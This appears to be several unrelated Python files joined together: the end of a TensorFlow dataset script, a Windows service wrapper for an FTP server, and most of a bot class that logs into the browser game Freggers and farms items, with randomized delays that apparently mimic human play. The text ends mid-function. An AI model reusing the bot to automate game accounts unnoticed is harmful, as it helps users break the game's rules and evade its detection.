'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
eftepede_service.py | #! /usr/bin/python
import sys
import win32serviceutil
import win32service
import win32event
import threading
import os
import eftepede_server
import traceback
import _winreg
class eftepedeService(win32serviceutil.ServiceFramework):
_svc_name_ = "eftepede"
_svc_display_name_ = "eftepede! FTP Server"
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hStopSignal = win32event.CreateEvent(None, 0, 0, None)
def SvcStop(self):
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
win32event.SetEvent(self.hStopSignal)
def SvcDoRun(self):
fh = open("C:\\temp\\eftepede-stderr.log","w")
sys.stderr = fh
sys.stdout = fh
try:
key = _winreg.OpenKey( _winreg.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\eftepede", _winreg.KEY_READ)
value, datatype = _winreg.QueryValueEx(key, "ImagePath")
directory = os.path.split(value)[0].replace('"','')
os.chdir(directory)
_winreg.CloseKey(key)
threading.Thread( target = eftepede_server.main ).start()
win32event.WaitForSingleObject(self.hStopSignal, win32event.INFINITE)
except:
traceback.print_exc( file = sys.stdout )
if __name__=='__main__':
win32serviceutil.HandleCommandLine(eftepedeService)
|
__init__.py | #Copyright (c) 2020 Jan Kiefer
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import random
import threading
import time
import math
import traceback
from datetime import datetime, date, timezone, timedelta
from .freggers import Freggers, Event
from .locale.de import LocaleDE
from .utils.item_search import ItemSearch
from .utils.item_pickup import ItemPickup
from .utils import format_time
from .iso import Status
TIMEZONE = timezone(timedelta(hours = 2))
def get_local_datetime():
return datetime.now(tz = TIMEZONE)
error_log = open('error.log', 'a')
def log_error(error):
traceback.print_exc()
traceback.print_exc(file = error_log)
error_log.flush()
class FreggersBot(Freggers):
CHAT_CHARS = {
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
'1', '2', '3', '4', '5', '6', '7', '8', '9', '0',
'ร', 'ร', 'ร', 'รค', 'รถ', 'รผ', ',', ';', '.', '-', '_', '!', '?', '<', '>', ':', '#', '\'', '"', '+', '*', '|', '~', '\\',
'^', 'ยฐ', 'ยง', '$', '%', '&', '/', '(', ')', '=', '`', 'ยด', ' '
}
PET_GUI_PREFIXES = {
'tp_botanik.suzy',
'tp_botanik.sparky',
'tp_botanik.claude',
'tp_botanik.fluffy',
'tp_botanik.betty',
'tp_botanik.pony',
'tp_botanik.santos',
'tp_botanik.gwen',
'tp_botanik.oskar',
'tp_botanik.ida',
'tp_botanik.nepo',
'tp_botanik.nyoko',
'tp_botanik.marvin'
}
AP_APARTMENT = 'plattenbau.eigenheim'
AP_HOOVER_STREET = 'hood.playrent'
AP_COCONUT_ISLAND = 'beach.inselrent'
AP_WEIDE = 'tp_botanik.weiderent'
MIN_ROOM_LOAD_DELAY = 0.2
MAX_ROOM_LOAD_DELAY = 4
MIN_SEARCH_DONE_DELAY = 0.2
MAX_SEARCH_DONE_DELAY = 8
def __init__(self, username, password, localeItems = LocaleDE, is_debug = False):
self.username = username
self.password = password
self.localeItems = localeItems
self.level_data = None
self.balance_data = None
self.start_level_data = None
self.room_waits = {}
self.speed_factor = 0.3 + random.random()
self.__fregger_check = None
self.__ants_times = {}
self.__church_visited_today = False
self.__e_room_ready = threading.Event()
self.__e_room_loaded = threading.Event()
self.__e_show_metromap = threading.Event()
self.__e_level_data = threading.Event()
self.__e_balance_data = threading.Event()
self.__e_success_cb = threading.Event()
self.__e_timer_bar = threading.Event()
self.__e_collect = threading.Event()
self.__e_quest_done = threading.Event()
self.timer_bar = None
self.quest = None
self.trash_items = {
localeItems.BEER_CRATE,
localeItems.FISH_BONE,
localeItems.DUNG_BEATLE,
localeItems.ACORN
}
self.trash_items.update(localeItems.EXPLORER_BADGE_ITEMS_0)
self.trash_items.update(localeItems.EXPLORER_BADGE_ITEMS_1)
self.trash_items.update(localeItems.EXPLORER_BADGE_ITEMS_2)
self.trash_items.update(localeItems.EXPLORER_BADGE_ITEMS_3)
self.prefered_store_items = {
localeItems.GNOME
}
self.consumable_items = {
localeItems.DRAGON_FLOWER,
localeItems.HORSE_FLOWER,
localeItems.DRAGON_TORCH,
localeItems.HORSESHOE,
localeItems.MUSIC_BOX,
localeItems.BLANKET,
localeItems.EMPTY_BOTTLE
}
self.disposable_consuamables = {
localeItems.DRAGON_MILK,
localeItems.DRAGON_MIXED_MILK,
localeItems.HORSE_MILK,
localeItems.HORSE_MIXED_MILK,
localeItems.CHILI,
localeItems.STRAWBERRY
}
self.disposable_consuamables.update(localeItems.LAZY_ANTS)
self.disposable_consuamables.update(localeItems.MUSHROOMS)
self.consumable_items.update(self.disposable_consuamables)
self.start = lambda: None
super(FreggersBot, self).__init__(log_prefix = '[' + self.username + ']', is_debug = is_debug, localeItems = localeItems)
self.register_callback(Event.CTXT_ROOM, self.__handle_room_ctxt)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, self.__handle_show_action)
self.register_callback(Event.ACTION_SHOW_METROMAP, self.__handle_show_metromap)
self.register_callback(Event.NOTIFY_LEVEL, self.__handle_level)
self.register_callback(Event.ENV_ITEM, self.__handle_env_item)
self.register_callback(Event.SHOW_TIMER_BAR, self.__handle_timer_bar)
self.register_callback(Event.OPEN_QUEST_VIEW, self.__handle_open_quest_view)
self.register_callback(Event.OPEN_QUEST_COMPLETED_VIEW, self.__handle_quest_completed)
self.register_callback(Event.NOTIFY_CREDIT_ACCOUNT, self.__handle_credit_account)
@staticmethod
def replace_non_chat_chars(str, replacement):
chat_chars = FreggersBot.CHAT_CHARS
for i, c in enumerate(str):
if c not in chat_chars:
str = str[:i] + replacement + str[i + 1:]
return str
def init(self):
self.log('Logging in...')
if self.init_session(self.username, self.password):
self.log('Logged in')
return True
else:
self.log('Could not login')
return False
def boot(self):
super(FreggersBot, self).boot()
self.__e_room_ready.wait()
self.send_show_metroplan()
self.__e_show_metromap.wait()
def __handle_credit_account(self, data):
self.balance_data = data
self.__e_balance_data.set()
def wait_balance_data(self):
self.__e_balance_data.wait()
def __handle_open_quest_view(self, data):
self.quest = data
def __handle_quest_completed(self, data):
self.quest = data['next_quest_label']
self.__e_quest_done.set()
def __handle_timer_bar(self, data):
self.timer_bar = data / 1000
self.__e_timer_bar.set()
def __handle_room_ctxt(self, room):
self.debug('Handle CTXT_ROOM:',room.room_context_label,room.gui(),room.room_gui,self.area_name,room.wob_id,
room.desc,room.topic,room.user_owns_room,room.owner_user_id,room.owner_user_name)
self.__e_room_loaded.clear()
self.__e_level_data.clear()
self.__e_room_ready.set()
room_waits = self.room_waits.get(room.room_context_label)
if room_waits != None:
request_metroplan = False
for room_wait in list(room_waits):
owner_id = room_wait['owner_id']
if owner_id == None or owner_id == room.owner_user_id:
if room_wait['area_index'] != None:
request_metroplan = True
else:
room_wait['success'] = True
room_wait['e'].set()
if request_metroplan:
self.send_show_metroplan()
def __handle_show_action(self, data):
if data == self.localeItems.NO_RIGHTS_TO_ENTER_ROOM or data == self.localeItems.ROOM_FULL:
for room_waits in self.room_waits.values():
for room_wait in list(room_waits):
room_wait['success'] = False
room_wait['e'].set()
def __handle_env_item(self, data):
self.debug('Handle ENV_ITEM:', data)
threading.Thread(target = self.__delayed_room_load_notify).start()
def wait_random_delay(self, min, max):
delay = min + (random.random() * (max - min)) * self.speed_factor
if delay > 0:
self.log('Waiting random delay of {} seconds.'.format(delay))
time.sleep(delay)
def __delayed_room_load_notify(self):
self.wait_random_delay(FreggersBot.MIN_ROOM_LOAD_DELAY, FreggersBot.MAX_ROOM_LOAD_DELAY)
self.__e_room_loaded.set()
def __handle_show_metromap(self, metromap_data):
self.debug('Metromap:', metromap_data)
self.__metromap = metromap_data
current_area_index = metromap_data[0]['label']
c_pos = current_area_index.find('%')
self.area_index = 0 if c_pos == -1 else int(current_area_index[c_pos + 1:c_pos + 2])
self.__e_show_metromap.set()
room_waits = self.room_waits.get(self.room.room_context_label)
if room_waits != None:
for room_wait in list(room_waits):
owner_id = room_wait['owner_id']
area_index = room_wait['area_index']
if (owner_id == None or owner_id == self.room.owner_user_id) and (area_index == None or area_index == self.area_index):
room_wait['success'] = True
room_wait['e'].set()
class WaitForEvent:
def __init__(self, freggers, event):
self.__freggers = freggers
self.event_type = event
self.event = threading.Event()
freggers.register_callback(event, self.__cb)
def __cb(self, data):
self.event.set()
def wait(self):
self.event.wait()
def clear(self):
self.event.clear()
def wait_once(self):
self.wait()
self.cleanup()
def cleanup(self):
self.__freggers.unregister_callback(self.event_type, self.__cb)
def get_wait_for_event(self, event):
return FreggersBot.WaitForEvent(self, event)
def wait_for_event(self, event):
e = threading.Event()
cb = lambda data: e.set()
self.register_callback(event, cb)
e.wait()
self.unregister_callback(event, cb)
def go_to_room(self, room_gui, exact):
plain_room_gui = room_gui
c_pos = plain_room_gui.find('%')
area_index = 0
if c_pos != -1:
c_end = plain_room_gui.index('.', c_pos)
area_index = int(plain_room_gui[c_pos + 1:c_end])
plain_room_gui = plain_room_gui[:c_pos] + plain_room_gui[c_end:]
c_pos = plain_room_gui.find('#@#')
owner_id = None
if c_pos != -1:
owner_id = int(plain_room_gui[c_pos + 3:])
plain_room_gui = plain_room_gui[:c_pos]
if exact:
self.__e_show_metromap.clear()
self.send_show_metroplan()
self.__e_show_metromap.wait()
if (self.room.room_context_label != plain_room_gui or (owner_id != None and self.room.owner_user_id != owner_id) or
(exact and area_index != self.area_index and owner_id == None)):
self.log('Going to room {} exact={} ...'.format(room_gui, exact))
wait = {
'e': threading.Event(),
'area_index': area_index if exact else None,
'owner_id': owner_id,
'success': False
}
waits = self.room_waits.get(plain_room_gui)
if waits == None:
waits = []
self.room_waits[plain_room_gui] = waits
waits.append(wait)
self.send_auto_walk_to(room_gui, False, exact)
wait['e'].wait()
waits.remove(wait)
self.log('Arrived in room {} success={}'.format(room_gui, wait['success']))
return wait['success']
return True
def throw_away_effects(self, inv = None):
self.log('Throwing away effects...')
if inv == None:
inv = self.ajax_request_inventory()
effect_names = self.localeItems.EFFECTS
target = [1, 1, 1] if self.player == None else self.player.wob_id
thrown = 0
slots_thrown = 0
for item in list(inv):
if item != None and item['description'] in effect_names:
for _ in range(item['count']):
self.ajax_item_usewith(item['id'], target)
thrown += 1
time.sleep(0.4)
slots_thrown += 1
inv.remove(item)
self.log('Thrown {} effect(s) out of {} slots.'.format(thrown, slots_thrown))
return (slots_thrown, thrown)
def get_target_pos(self, wob_id):
obj = self.wob_registry.get_object_by_wobid(wob_id)
if obj != None:
anim = self.animation_manager.get_animation(obj.iso_obj)
if anim != None:
return anim.get_target_pos()
return obj.iso_obj.get_uvz()
return None
def delete_item(self, item):
self.log('Deleting item \'{}\' count={} id={} ...'.format(item['description'], item['count'], item['id']))
return self.ajax_delete_item(item['id'])
def delete_trash_items(self, inv = None, queue = None):
if inv == None:
inv = self.ajax_request_inventory()
if queue == None:
queue = self.ajax_request_item_queue()
count_inv = 0
for item in list(inv):
if item != None and item['description'] in self.trash_items:
self.delete_item(item)
inv.remove(item)
count_inv += 1
count_queue = 0
for item in list(queue):
if item['description'] in self.trash_items:
self.ajax_inbox_action(item['id'], Freggers.INBOX_ACTION_DECLINE)
queue.remove(item)
count_queue += 1
return (count_inv, count_queue)
@staticmethod
def count_empty_slots(container):
count = 0
for item in container:
if item == None:
count += 1
return count
@staticmethod
def filter_items(container, item_names):
return list(filter(lambda item: item != None and item['description'] in item_names, container))
@staticmethod
def filter_item(container, item_name):
return list(filter(lambda item: item != None and item['description'] == item_name, container))
@staticmethod
def count_items(container, item_names):
count = 0
for item in container:
if item != None and item['description'] in item_names:
count += 1
return count
@staticmethod
def count_item(container, item_name):
count = 0
for item in container:
if item != None and item['description'] == item_name:
count += 1
return count
def get_item_count(self, item_name):
count = 0
inv = self.ajax_request_inventory()
for item in inv:
if item != None and item['description'] == item_name:
count += 1
queue = self.ajax_request_item_queue()
for item in queue:
if item['description'] == item_name:
count += 1
return count
def get_items_count(self, item_names):
count = 0
inv = self.ajax_request_inventory()
for item in inv:
if item != None and item['description'] in item_names:
count += 1
queue = self.ajax_request_item_queue()
for item in queue:
if item['description'] in item_names:
count += 1
return count
def __collect_handle_create_item(self, data):
self.__collect_remaining_wait = 0
self.__collect_amount += 1
self.__e_collect.set()
def __collect_handle_timer_bar(self, duration):
self.__collect_time = time.time()
def __collect_handle_action_feedback(self, txt):
if txt.endswith(self.localeItems.USE_WAIT_SUFFIX):
unit = 1 if self.localeItems.SECONDS in txt else 60
value = [int(s) for s in txt.split() if s.isdigit()][0]
self.__collect_remaining_wait = value * unit
else:
self.__collect_remaining_wait = 0
self.__e_collect.set()
def __init_collect(self):
self.__collect_amount = 0
self.__collect_remaining_wait = 0
self.register_callback(Event.NOTIFY_CREATE_ITEM, self.__collect_handle_create_item)
self.register_callback(Event.SHOW_TIMER_BAR, self.__collect_handle_timer_bar)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, self.__collect_handle_action_feedback)
def __deinit_collect(self):
self.unregister_callback(Event.NOTIFY_CREATE_ITEM, self.__collect_handle_create_item)
self.unregister_callback(Event.SHOW_TIMER_BAR, self.__collect_handle_timer_bar)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, self.__collect_handle_action_feedback)
self.__collect_amount = None
self.__collect_remaining_wait = None
def collect_bottles(self, max_amount = 0):
self.__init_collect()
room_guis = [{'plattenbau.metro': 'wutzlhofen.schach_parkabfalleimer',
'plattenbau.bolzplatz': 'hood.strasse_muelltonne'},
{'hood.strasse': 'hood.strasse_muelltonne',
'hood.waschsalon': 'hood.waschsalon_plastikmuelleimer'},
{'wutzlhofen.uferpromenade': 'wutzlhofen.uferpromenade_abfalleimerblau',
'wutzlhofen.schach': 'wutzlhofen.schach_parkabfalleimer',
'wutzlhofen.passage': 'wutzlhofen.passage_muelleimer'}]
len_areas = len(room_guis)
area_index = random.randint(0, len_areas - 1)
collected_bottles = 0
while True:
self.log('[Bottles] Collecting {} / {}...'.format(collected_bottles, max_amount))
rooms = room_guis[area_index]
area_index = (area_index + 1) % len_areas
for room_label in rooms.keys() if random.random() > 0.5 else reversed(list(rooms.keys())):
gui = rooms[room_label]
self.go_to_room(room_label, False)
self.__e_room_loaded.wait()
for target in self.sort_iso_items_by_distance(list(filter(lambda iso_item: iso_item.gui == gui and iso_item.has_interaction('SEARCH'), self.wob_registry.iso_items))):
self.log('[Bottles] Interacting with {} ({})...'.format(target.name, target.gui))
self.__e_collect.clear()
self.send_item_interaction(target.wob_id, 'SEARCH')
self.__e_collect.wait()
self.wait_random_delay(FreggersBot.MIN_SEARCH_DONE_DELAY, FreggersBot.MAX_SEARCH_DONE_DELAY)
collected_bottles = self.get_item_count(self.localeItems.EMPTY_BOTTLE)
if max_amount != 0 and collected_bottles >= max_amount:
self.__deinit_collect()
return collected_bottles
def collect_ants(self, max_amount = 0):
self.__init_collect()
rooms = ['western.indianerdorf', 'western.camp']
len_rooms = len(rooms)
room_index = random.randint(0, len_rooms - 1)
while True:
self.log('Collecting ants {} / {}...'.format(self.__collect_amount, max_amount))
for _ in range(len_rooms):
room = rooms[room_index]
room_index = (room_index + 1) % len_rooms
self.go_to_room('western.rail', False)
self.__e_room_loaded.wait()
self.go_to_room(room, False)
self.__e_room_loaded.wait()
cactuses = list(filter(lambda iso_item: iso_item.gui == 'western.kaktus02', self.wob_registry.iso_items))
lim_cactuses = len(cactuses)
cactus_index = random.randint(0, lim_cactuses - 1)
for _ in range(lim_cactuses):
cactus_wob_id = cactuses[cactus_index].wob_id
cactus_index = (cactus_index + 1) % lim_cactuses
while True:
self.log('[Ants] Interacting with cactus')
self.__e_collect.clear()
self.send_item_interaction(cactus_wob_id, 'SEARCH')
self.__e_collect.wait()
remaining_wait_time = self.__collect_remaining_wait
if remaining_wait_time == 0:
self.__ants_times[cactus_wob_id] = self.__collect_time
self.wait_random_delay(FreggersBot.MIN_SEARCH_DONE_DELAY, FreggersBot.MAX_SEARCH_DONE_DELAY)
if max_amount != 0 and max_amount <= self.__collect_amount:
ants_collected = self.__collect_amount
self.__deinit_collect()
return ants_collected
break
last_cactus_time = self.__ants_times.get(cactus_wob_id)
if last_cactus_time != None:
remaining_wait = 184 - (time.time() - last_cactus_time)
if remaining_wait > 0:
self.log('[Ants]', 'Waiting {} more seconds.'.format(remaining_wait))
time.sleep(remaining_wait)
continue
idle_time = remaining_wait_time + 1 if remaining_wait_time <= 60 else self.__collect_remaining_wait * 0.75
self.log('[Ants]', 'Waiting {} seconds before retrying.'.format(idle_time))
time.sleep(idle_time)
def collect_eggs(self, max_amount = 0):
self.__init_collect()
room_guis = [{'plattenbau.metro': ['hood.getraenkedoserot'],
'plattenbau.plattenbau': ['hood.getraenkedoserot'],
'plattenbau.bolzplatz': ['wutzlhofen.plaza_hydrant']},
{'wutzlhofen.plaza': ['wutzlhofen.plaza_hydrant'],
'wutzlhofen.diner': ['wutzlhofen.diner_kuehlschrank'],
'wutzlhofen.passage': ['wutzlhofen.buchsbaum'],
'wutzlhofen.disko': ['wutzlhofen.disko_boxenturm'],
'wutzlhofen.wohlwert': ['wutzlhofen.wohlwert_wohlwertkiste'],
'wutzlhofen.schach': ['wutzlhofen.schach_baumstumpf'],
'wutzlhofen.museum': ['wutzlhofen.museum_schaukasten1'],
'wutzlhofen.uferpromenade': ['wutzlhofen.uferpromenade_kiosk'],
'wutzlhofen.kroetenbank': ['wutzlhofen.kroetenbank_schirmstaender'],
'wutzlhofen.flussdampfer': ['wutzlhofen.flussdampfer_belueftung']},
{'hood.gym': ['hood.gym_pressbank1', 'hood.gym_gewicht'],
'hood.punk': ['hood.punk_punktisch'],
'hood.backalley': ['hood.backalley_ziegelstapel', 'hood.ghettoblaster'],
'hood.waschsalon': ['hood.waschsalon_aschenbecher', 'hood.waschsalon_waeschekorb'],
'hood.friseur': ['hood.getraenkedoserot'],
'hood.outskirts': ['hood.zeitschriftenhaufen', 'hood.ghettoblaster'],
'hood.hiphop': ['hood.hiphop_hiphopghetto']},
{'western.rail': ['western.kaktus02', 'western.kaktus03'],
'western.fort': ['western.fort_pulverfass', 'western.kanone2'],
'western.saloonzimmer3': ['western.badezuber'],
'western.saloonzimmer2': ['western.badezuber'],
'western.camp': ['western.camp_geige'],
'western.indianerdorf': ['western.kaktus01']},
{'tp_botanik.cafe': ['tp_botanik.loungetisch', 'tp_botanik.spiralentisch']},
{'beach.beach3': ['western.kaktus03'],
'beach.beach2': ['western.kaktus03']},
{'gothics.raum9': ['gothics.raum9_tisch_rund'],
'gothics.gruft': ['wutzlhofen.fu_ku2009_pizzabox_002'],
'gothics.waldraum02': ['wutzlhofen.schach_baumstumpf']}]
len_areas = len(room_guis)
_last_area_indices = [-1, -1]
def next_area():
i = random.randint(0, len_areas - 1)
while i == _last_area_indices[0] or i == _last_area_indices[1]:
i = random.randint(0, len_areas - 1)
_last_area_indices[1] = _last_area_indices[0]
_last_area_indices[0] = i
return i
while True:
self.log('[Eggs] Collecting {} / {}...'.format(self.__collect_amount, max_amount))
for room_label, guis in room_guis[next_area()].items():
self.go_to_room(room_label, False)
self.__e_room_loaded.wait()
search_targets = list(filter(lambda iso_item: iso_item.gui in guis and iso_item.has_interaction('SEARCH'), self.wob_registry.iso_items))
lim_targets = len(search_targets)
target_index = 0 if lim_targets < 2 else random.randint(0, lim_targets - 1)
for _ in range(lim_targets):
target = search_targets[target_index]
target_wob_id = target.wob_id
target_index = (target_index + 1) % lim_targets
self.log('[Eggs] Interacting with {} ({})...'.format(target.name, target.gui))
self.__e_collect.clear()
self.send_item_interaction(target_wob_id, 'SEARCH')
self.__e_collect.wait()
self.wait_random_delay(FreggersBot.MIN_SEARCH_DONE_DELAY, FreggersBot.MAX_SEARCH_DONE_DELAY)
if max_amount != 0 and self.__collect_amount >= max_amount:
collected_eggs = self.__collect_amount
self.__deinit_collect()
return collected_eggs
def __cb_success(self, data):
self.__success = True
self.__e_success_cb.set()
def __cb_failure(self, data):
self.__success = False
self.__e_success_cb.set()
def search_covered_wagon(self):
self.log('Searching covered wagon...')
if self.room.room_context_label != 'western.backlands':
if self.room.room_context_label != 'western.indianerdorf':
self.go_to_room('western.rail', False)
self.__e_room_loaded.wait()
self.go_to_room('western.indianerdorf', False)
self.__e_room_loaded.wait()
self.go_to_room('western.backlands', False)
self.__e_room_loaded.wait()
self.__success = False
for item in self.wob_registry.iso_items:
if item.gui == 'western.planwagen':
self.__e_success_cb.clear()
self.register_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
self.send_item_interaction(item.wob_id, 'SEARCH')
self.__e_success_cb.wait()
self.unregister_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
break
self.log('Successfully searched covered wagon:', self.__success)
return self.__success
def search_noisy_construction_site(self):
self.log('Searching noisy construction site...')
self.go_to_room('hood.strasse', False)
self.__e_room_loaded.wait()
self.go_to_room('hood.outskirts', False)
self.__e_room_loaded.wait()
self.__success = False
for item in self.wob_registry.iso_items:
if item.gui == 'wutzlhofen.baustelle':
self.__e_success_cb.clear()
self.register_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.register_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
self.send_item_interaction(item.wob_id, 'SEARCH')
self.__e_success_cb.wait()
self.unregister_callback(Event.NOTIFY_CREATE_ITEM, self.__cb_success)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, self.__cb_failure)
break
self.log('Successfully searched noisy construction site:', self.__success)
return self.__success
def deliver_ants(self, amount):
ants_in_queue = None
inv = self.ajax_request_inventory()
ants_in_inv = self.count_items(inv, self.localeItems.LAZY_ANTS)
if ants_in_inv == 0 and not self.ensure_empty_slots(1):
self.log('[Deliver Ants] No inventory slots available.')
return 0
inv = self.ajax_request_inventory()
ants_in_inv = self.count_items(inv, self.localeItems.LAZY_ANTS)
slots_usable = FreggersBot.count_empty_slots(inv) + ants_in_inv
self.go_to_room('gothics.raum9', False)
self.__e_room_loaded.wait()
self.go_to_room('gothics.friedhof', False)
self.__e_room_loaded.wait()
self.go_to_room('gothics.eule', False)
self.__e_room_loaded.wait()
wob_id = None
for item in self.wob_registry.iso_items:
if item.gui == 'wutzlhofen.ameisenhaufen_bug':
wob_id = item.wob_id
if wob_id == None:
self.log('[Deliver Ants] Anthill not found.')
return 0
self.__expect_deliver_event = False
self.__ants_delivered_amount = 0
self.__ant_delivered_success = False
self.__e_ant_delivered = threading.Event()
def handle_timer_bar(data):
if self.__expect_deliver_event:
self.debug('[Deliver Ants] Timer bar:', data)
self.__expect_deliver_event = False
self.__ant_delivered_success = True
self.__e_ant_delivered.set()
def handle_show_action(data):
if self.__expect_deliver_event:
self.debug('[Deliver Ants] Show action:', data)
self.__expect_deliver_event = False
self.__ant_delivered_success = False
self.__e_ant_delivered.set()
self.register_callback(Event.SHOW_ACTION_FEEDBACK, handle_show_action)
self.register_callback(Event.SHOW_TIMER_BAR, handle_timer_bar)
if ants_in_inv < amount:
ants_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.LAZY_ANTS)
deliver_amount = min(amount, ants_in_inv + (0 if ants_in_queue == None else len(ants_in_queue)))
delivered_amount = 0
while delivered_amount < deliver_amount:
remaining_amount = deliver_amount - delivered_amount
if ants_in_inv == 0:
accept_amount = min(slots_usable, remaining_amount)
for _ in range(accept_amount):
ant_in_queue = ants_in_queue.pop(0)
self.ajax_inbox_action(ant_in_queue['id'], Freggers.INBOX_ACTION_ACCEPT)
ants_in_inv = self.count_items(self.ajax_request_inventory(), self.localeItems.LAZY_ANTS)
if ants_in_inv < remaining_amount:
ants_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.LAZY_ANTS)
else:
self.__expect_deliver_event = True
self.__e_ant_delivered.clear()
self.send_item_interaction(wob_id, 'DELIVER_ANT')
self.__e_ant_delivered.wait()
if self.__ant_delivered_success:
self.log('[Deliver Ants] Successfully delivered ant.')
self.__ant_delivered_success = False
delivered_amount += 1
ants_in_inv -= 1
self.wait_random_delay(1, 1.8)
else:
self.log('[Deliver Ants] No ant in inventory to deliver.')
ants_in_inv = self.count_items(self.ajax_request_inventory(), self.localeItems.LAZY_ANTS)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, handle_show_action)
self.unregister_callback(Event.SHOW_TIMER_BAR, handle_timer_bar)
del self.__ants_delivered_amount
del self.__e_ant_delivered
del self.__expect_deliver_event
return delivered_amount
def return_bottles(self, amount, beer_crates = False):
bottles_in_queue = None
inv = self.ajax_request_inventory()
bottles_in_inv = self.count_items(inv, self.localeItems.EMPTY_BOTTLE)
if not beer_crates:
for item in list(inv):
if item != None and item['description'] == self.localeItems.BEER_CRATE:
self.delete_item(item)
inv.remove(item)
if bottles_in_inv == 0 and not self.ensure_empty_slots(1):
self.log('[Return Bottles] No inventory slots available.')
return 0
inv = self.ajax_request_inventory()
bottles_in_inv = self.count_items(inv, self.localeItems.EMPTY_BOTTLE)
slots_usable = FreggersBot.count_empty_slots(inv) + bottles_in_inv
self.go_to_room('hood.strasse', False)
self.__e_room_loaded.wait()
self.go_to_room('hood.outskirts', False)
self.__e_room_loaded.wait()
target = self.find_item_by_gui('hood.recyclingautomat')
if target == None:
self.log('[Return Bottles] Could not find reverse vending machine.')
return 0
wob_id = target.wob_id
self.__expect_return_event = False
self.__bottles_returned_amount = 0
self.__bottles_returned_success = False
self.__e_bottles_returned = threading.Event()
def handle_timer_bar(data):
if self.__expect_return_event:
self.log('[Return Bottles] Timer bar:', data)
self.__expect_return_event = False
self.__bottles_returned_success = True
self.__e_bottles_returned.set()
def handle_show_action(data):
if self.__expect_return_event:
self.log('[Return Bottles] Show action:', data)
self.__expect_return_event = False
self.__bottles_returned_success = False
self.__e_bottles_returned.set()
self.register_callback(Event.SHOW_ACTION_FEEDBACK, handle_show_action)
self.register_callback(Event.SHOW_TIMER_BAR, handle_timer_bar)
if bottles_in_inv < amount:
bottles_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.EMPTY_BOTTLE)
return_amount = min(amount, bottles_in_inv + (0 if bottles_in_queue == None else len(bottles_in_queue)))
returned_amount = 0
while returned_amount < return_amount:
remaining_amount = return_amount - returned_amount
if bottles_in_inv == 0:
accept_amount = min(slots_usable, remaining_amount)
for _ in range(accept_amount):
bottle_in_queue = bottles_in_queue.pop(0)
self.ajax_inbox_action(bottle_in_queue['id'], Freggers.INBOX_ACTION_ACCEPT)
bottles_in_inv = self.count_items(self.ajax_request_inventory(), self.localeItems.EMPTY_BOTTLE)
if bottles_in_inv < remaining_amount:
bottles_in_queue = self.filter_items(self.ajax_request_item_queue(), self.localeItems.EMPTY_BOTTLE)
else:
self.__expect_return_event = True
self.__e_bottles_returned.clear()
self.send_item_interaction(wob_id, 'RETURN_EMPTY_BOTTLE')
self.__e_bottles_returned.wait()
if self.__bottles_returned_success:
self.log('[Return Bottles] Successfully returned empty bottle.')
self.__bottles_returned_success = False
returned_amount += 1
bottles_in_inv -= 1
self.wait_random_delay(1, 1.8)
else:
self.log('[Return Bottles] No empty bottle in inventory to return.')
bottles_in_inv = self.count_items(self.ajax_request_inventory(), self.localeItems.EMPTY_BOTTLE)
self.unregister_callback(Event.SHOW_ACTION_FEEDBACK, handle_show_action)
self.unregister_callback(Event.SHOW_TIMER_BAR, handle_timer_bar)
del self.__bottles_returned_amount
del self.__e_bottles_returned
del self.__expect_return_event
self.log('[Return Bottles] Returned {} empty bottles.'.format(returned_amount))
return returned_amount
def __handle_level(self, data):
time_now = time.time()
self.debug('Level data updated:', data)
self.level_data = data
self.level_data_timestamp = time_now
self.__e_level_data.set()
@staticmethod
def contains(iterable, matchFunc):
for item in iterable:
if matchFunc(item):
return True
return False
def ensure_empty_slots(self, count, inv = None):
if inv == None:
inv = self.ajax_request_inventory()
remaining_slots = count - FreggersBot.count_empty_slots(inv)
if remaining_slots > 0:
self.log('Ensuring {}/{} empty slot(s) in inventory...'.format(remaining_slots, count))
deleted_slot_count = self.delete_trash_items(inv = inv)[0]
remaining_slots -= deleted_slot_count
self.log('Deleted {} trash items.'.format(deleted_slot_count))
if remaining_slots > 0:
self.log('Throwing away effects...')
self.__e_room_loaded.wait()
effect_slots, effect_count = self.throw_away_effects(inv = inv)
if effect_slots > 0:
self.log('Threw {} effects out of {} slots away.'.format(effect_count, effect_slots))
remaining_slots -= effect_slots
if remaining_slots > 0:
